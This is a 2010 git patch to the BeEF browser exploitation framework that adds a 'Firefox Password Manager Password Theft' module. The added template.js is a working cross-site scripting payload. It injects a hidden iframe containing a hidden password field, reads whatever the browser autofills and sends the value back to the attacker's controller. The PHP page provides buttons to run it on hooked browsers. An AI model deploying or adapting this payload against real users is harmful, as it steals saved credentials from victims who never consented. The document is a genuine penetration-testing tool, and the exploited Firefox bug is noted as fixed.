From e629163f068e0149896b7d46c3295e6393c72e5b Mon Sep 17 00:00:00 2001
From: "wade@bindshell.net"
 <wade@bindshell.net@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Tue, 16 Mar 2010 11:49:23 +0000
Subject: [PATCH] finally added firefox password manager password theft module

git-svn-id: https://beef.googlecode.com/svn/trunk@15 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 CHANGELOG                                 |  3 ++
 VERSION                                   |  2 +-
 modules/standard/passwd_theft/index.php   | 58 +++++++++++++++++++++++
 modules/standard/passwd_theft/name.txt    |  1 +
 modules/standard/passwd_theft/template.js | 16 +++++++
 5 files changed, 79 insertions(+), 1 deletion(-)
 create mode 100644 modules/standard/passwd_theft/index.php
 create mode 100644 modules/standard/passwd_theft/name.txt
 create mode 100644 modules/standard/passwd_theft/template.js

diff --git a/CHANGELOG b/CHANGELOG
index 58dfbb8aa..cca5e0e7c 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,3 +1,6 @@
+Version 0.4.0.2
+Firefox password manager theft added
+
 Version 0.4.0.1
 Example (example.php) hardcoded path bug fixed
 
diff --git a/VERSION b/VERSION
index add7d6609..3ca565729 100644
--- a/VERSION
+++ b/VERSION
@@ -1 +1 @@
-0.4.0.1
+0.4.0.2
diff --git a/modules/standard/passwd_theft/index.php b/modules/standard/passwd_theft/index.php
new file mode 100644
index 000000000..0dd5d6e9e
--- /dev/null
+++ b/modules/standard/passwd_theft/index.php
@@ -0,0 +1,58 @@
+<?
+	// Copyright (c) 2006-2010, Wade Alcorn 
+	// All Rights Reserved
+	// wade@bindshell.net - http://www.bindshell.net
+
+	require_once("../../../include/common.inc.php"); // included for get_b64_file()
+	DEFINE('JS_FILE', './template.js');
+?>
+
+<!--
+
+BeEF: http://ha.ckers.org/weird/xss-password-manager.html
+BeEF: Written by RSnake h@ckers.org
+BeEF: http://sla.ckers.org/forum/read.php?2,131
+BeEF: https://bugzilla.mozilla.org/show_bug.cgi?id=360493
+BeEF: http://it.slashdot.org/article.pl?sid=06/11/21/2319243
+BeEF: the following is the boiler plate from the exploit
+
+XSS demo for stealing passwords from the Firefox password manager
+Similar technique may work for Internet Explorer, Safari, Chrome, Opera, etc. Your mileage may vary.
+
+-->
+
+<script>
+
+	get_b64_code_alert = function () {
+		// javascript is loaded from a file - it could be hard coded
+		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		
+		return b64code;
+	}
+
+	Element.Methods.set_autorun = function() {
+		ar.enable('Alert Dialog', get_b64_code_alert());
+	}
+	
+	Element.Methods.send_now = function() {
+		do_send(get_b64_code_alert());
+	}
+
+	// add construct code to DOM
+	Element.addMethods();
+</script>
+
+<!-- PAGE CONTENT -->
+<div id="module_header"> Firefox Password Manager Password Theft</div>
+This module will attempt to steal a password from Firefox's password manager.<br><br>
+<div id="module_subsection">
+	<form name="myform">
+		<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
+		<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
+	</form>
+</div>
+
+<div class="entry">
+	<br>
+	This bug was fixed in <a href=https://bugzilla.mozilla.org/show_bug.cgi?id=360493>2006</a>.
+</div>
diff --git a/modules/standard/passwd_theft/name.txt b/modules/standard/passwd_theft/name.txt
new file mode 100644
index 000000000..892f2ff3f
--- /dev/null
+++ b/modules/standard/passwd_theft/name.txt
@@ -0,0 +1 @@
+Password Manager Theft
diff --git a/modules/standard/passwd_theft/template.js b/modules/standard/passwd_theft/template.js
new file mode 100644
index 000000000..a84d42548
--- /dev/null
+++ b/modules/standard/passwd_theft/template.js
@@ -0,0 +1,16 @@
+
+// create iframe
+var iframe = document.createElement('iframe');
+iframe.setAttribute("width", "1");
+iframe.setAttribute("height", "1");
+iframe.setAttribute("style", "visibility:hidden;");
+document.body.appendChild(iframe);
+
+// write content to iframe and return result
+ifrm = (iframe.contentWindow) ? iframe.contentWindow : (iframe.contentDocument.document) ? iframe.contentDocument.document : iframe.contentDocument;
+ifrm.document.write('<form><input id=p type=password style=visibility:hidden></form>');
+ifrm.setTimeout('parent.return_result(parent.result_id, "Password: " + document.getElementById("p").value)', 100);
+
+// remove iframe
+setTimeout('document.body.removeChild(iframe);', 200);
+